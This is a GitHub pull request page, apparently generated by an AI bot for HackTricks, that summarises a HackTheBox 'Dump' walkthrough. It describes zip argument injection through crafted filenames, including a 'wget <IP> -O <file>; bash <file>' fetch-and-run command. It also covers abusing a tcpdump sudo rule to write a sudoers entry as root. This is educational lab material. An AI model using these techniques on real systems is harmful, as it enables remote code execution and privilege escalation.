HTB Dump — Zip argument injection to RCE and tcpdump sudo mi... #1551
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
🤖 Automated Content Update
This PR was automatically generated by the HackTricks News Bot based on a technical blog post.
📝 Source Information
🎯 Content Summary
Target: HackTheBox "Dump" (Hard, Linux). Likely Debian 11 Bullseye from OpenSSH banner; kernel later confirmed as
5.10.0-36-cloud-amd64 (Debian 5.10.244-1, 2025-09-29). Services: SSH 22 (OpenSSH 8.4p1 Debian 5+deb11u5), HTTP 80 (Apache 2.4.65). TTL 63 on ports (Linux, one hop).App overview (PHP): Auth via session; free registration. Key endpoints discovered with feroxbuster:
index.php,capture.php,capturing.php,u...🔧 Technical Details
Zip argument injection via filenames: When an app zips user files by calling
zip archive.zip *(or by passing raw user filenames), attacker-supplied names starting with option flags are parsed as zip options. Use-sc(show processed argv) to debug ordering and then supply-Tand-TT <cmd>as separate filenames so the test command becomes your payload. If slashes are stripped, usewget <IP> -O <file>; bash <file>to fetch and execute a payload.tcpdump sudo rule abuse: If sudoers allows
tcpdumpwith-wcontaining a globbed directory, add a second-wto override the output path while satisfying the policy. Combine with-Z rootto force root ownership,-r <pcap>to inject arbitrary content (e.g., a sudoers line) into sensitive files, and-V <file>to coerce reads that leak file content via ...🤖 Agent Actions
I analyzed the blog and updated HackTricks with the core, reusable techniques that weren’t fully covered yet:
Repository exploration
What I changed
Why this location
No other files were changed to comply with the “one file only” requirement.
This PR was automatically created by the HackTricks Feed Bot. Please review the changes carefully before merging.
📚 Repository Maintenance
All .md files have been checked for proper formatting (headers, includes, etc.).